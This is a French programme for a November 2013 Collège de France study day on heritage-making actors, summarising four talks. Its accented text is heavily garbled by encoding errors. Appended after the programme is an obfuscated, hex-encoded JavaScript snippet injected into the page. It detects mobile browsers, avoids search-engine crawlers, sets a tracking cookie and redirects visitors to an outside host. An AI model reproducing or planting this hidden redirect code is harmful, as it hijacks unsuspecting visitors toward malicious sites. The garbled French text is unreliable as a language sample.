JOURNA�E D’A�TUDE FABRIQ’AM : Les entrepreneurs de patrimonialisation, 27 novembre 2013, CollA?ge de France, Paris

LES ENTREPRENEURS DE PATRIMONIALISATION

A�JournA�e FABRIQa��AM organisA�e par Silvia MACEDO et GA�rard COLLOMB

Le 27 novembre, CollA?ge de France, 52 rue du Cardinal Lemoine, 75005 Paris

salle LA�vi-Strauss, 10h-13h

A quel moment historique, dans quel contexte social, sa��engagent les opA�rations de patrimonialisationA�?A�Qu’est-ce qui suscite la mise en route de ces processus, qui pousse une sociA�tA� A� produire un discours A�A�patrimonialA�A�, un discours sur soi pour la��autre, mais A�galement pour soi, A� instituer sa culture comme un A�A�bien communA�A�.A�Et quels sont les acteursA�qui font advenir et rendent possible cette A�A�mise en patrimoineA�A�,A�qui permettent A� ces processus da��A�merger puis de prendre formeA�?

De quelle maniA?re ces A�A�passeursA�A�, ces A�A�entrepreneurs de patrimonialisationA�A�, sont-ils, par leur histoire personnelle et par leur position sociale, A� mA?me de recevoir une lA�gitimitA� depuis les deux mondes et de produire de la��intA�rieur des images acceptables par la��extA�rieurA�? Ces A�A�passeursA�A� sont, bien entendu des acteurs travaillant A� l’intA�rieur des sociA�tA�s considA�rA�es, mais ils sont aussi articulA�s A� des acteurs extA�rieurs, institutionnels, des Ong ou, bien sA�r, des ethnologues, conduisant A� soulever la question duA�rA?le, de la��implication et de la responsabilitA� des anthropologues face aux projets de patrimonialisation.

Dans le prolongement de la sA�ance du 17 octobre on continuera A� sa��interroger, A� partir de la prA�sentation de quatre situations contrastA�es, sur leA�contexte social, A�conomique, politique, institutionnel, dans lequel sa��engagent les opA�rations de A�A�patrimonialisationA�A�A�et sur les acteurs qui les mettent en A�uvre.

***

PROGRAMME

10h-10h15

IntroductionA�par GA�rard COLLOMB

10h15-10h45

Passer quoi, a qui et jusqua��A� oA?? La chaA�ne de production da��un patrimoine. Le cas wajA?pi

Silvia MACEDO, EREA

Les pratiques orales et graphiquesA�kusiwaA�des amA�rindiens wajA?pi ont A�tA� proclamA�s patrimoine oral et immatA�riel en 2003 et inscrites sur la liste reprA�sentative du patrimoine culturel immatA�riel de la��humanitA� de La��UNESCO en 2008. ONG, association amA�rindienne, chefs de villages, jeunes leaders amA�rindiens, anthropologues, institutions patrimoniales et de protection des amA�rindiens se retrouvent parmi les a�?entrepreneursa�� de ce processus de patrimonialisation. Dans cette intervention ja��aborderai le rA?le de ces entrepreneurs, leurs interactions et leurs contradictions dans le contexte de production et de visibilitA� de cette pratique culturelle.

10h45-11h15

Entre excellence et ordinaire: la A�A�mise en patrimoineA�A� de la��improvisation poA�tique en Toscane (Italie)

Grazia TIEZZI, LIAS/IMM- EHESS

ConsidA�rA�e comme une forme de poA�sies populaire attestA�e depuis le Moyen Age, la pratique da��improvisation poA�tique en ottava rima est encore prA�sente en Toscane et dans da��autres rA�gions de la��Italie centrale. Celle que la��est observable aujourda��hui consiste en une forme de performance souvent rA�alisA�e sur le mode da��un spectacle publique composA� par des joutes verbales ou oratoires improvisA�es, chantA�es et versifiA�es entre deux ou parfois davantage poA?tes adversaires.A�Cette tradition orale a survA�cu A� une longue pA�riode de dA�clin et A� partir de la fin des annA�es 90 elle a recommencA� son effervescence dans certains villages de la Toscane et de la�� Apennin central. La reprise de cette pratique traditionnelle a produit rA�cemment un dA�bat vivace et parfois conflictuel concernant son statut de bien du A�A�patrimoine immatA�rielA�A� et le processus de sa candidature pour la reconnaissance UNESCO.A�Mon intervention aura le but de dA�crire les diffA�rents protagonistes du dA�bat de ces derniA?res annA�es, les tensions qui la��ont animA� et les divers engagements provoquA�s peut A?tre, par la��introduction de la perspective de A�A�patrimonialisationA�A� dans le A�champA� da��une pratique traditionnelle da��art verbal improvisA�.

Discussion

11h30-12h00

Trois passeurs ou promoteurs culturels dogon (Mali)

Eric JOLLY, CNRS-CEMAF

Dans mes recherches, je n’ai abordA� la question du patrimoine que de maniA?re indirecte. Partant notamment des travaux de l’Ecole Griaule, j’ai A�tudiA� la circulation mondiale da��une poignA�e da��emblA?mes culturels dogon qui, en retour, ont A�tA� partiellement rA�cupA�rA�s, rA�interprA�tA�s et valorisA�s par les A�lites urbaines dogon. Lors de ce processus de rA�appropriation, plusieurs A� passeurs A� jouent un rA?le dA�terminant en raison de la��A�tendue de leurs rA�seaux, de leur savoir prA�sumA� (ou de leur puissance financiA?re) et de la��autoritA� qua��on leur reconnaA�t. Je me propose da��en prA�senter trois, trA?s diffA�rents : un ancien catA�chiste A� traditionniste A�, un riche entrepreneur et une association culturelle.

12h00-12h30

OpA�rations de patrimonialisation en contexte communiste. Portrait da��un fonctionnaire chinois passionnA�

Katiana LE MENTEC, Centre da��Etudes sur la Chine Moderne et Contemporaine

La construction du barrage des Trois Gorges (Hubei, Chine) a entrainA� l’inondation des berges du Yangtze et de ses affluents sur prA?s de 600 kilomA?tres. Des opA�rations de patrimonialisation ont A�tA� dA�veloppA�es dans la rA�gion affectA�e. Un programme de sauvetage des vestiges a prA�cA�dA� la construction de musA�es et de parcs patrimoniaux dans cette rA�gion rurale et montagneuse non familiA?re de ce type da��institution. Ces actions ont A�tA� menA�es exclusivement par les instances publiques, sans consultation avec la population comme il est usuel de le voir en Chine. Dans ce contexte, Xiao Min, fonctionnaire membre du parti communiste, fut la��un des plus actifs A�A�entrepreneurs de patrimonialisationA�A�. Il a A�A�inventA�A�A� une tradition culturelle formant un nouveau paradigme permettant de rendre compte de la��histoire et de la��identitA� rA�gionales, tout en dA�dramatisant le dA�placement de masse provoquA� par le barrage. Il a mis en place des mesures pour la soutenir (fA?tes, musA�es, protections de vestiges). VA�tA�rinaire de formation passionnA� de culture rA�gionale, ses initiatives au district de Yunyang lui ont permis de se hisser au sommet de la��administration rA�gionale de la culture (MunicipalitA� de Chongqing). Ces propositions ne sA�duisent toutefois qua��une partie de la population – la��A�lite. Les habitants des zones rurales ne sa��y reconnaissent pas.

12h30-13h

RA�actions aux derniers exposA�s et discussion finale

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}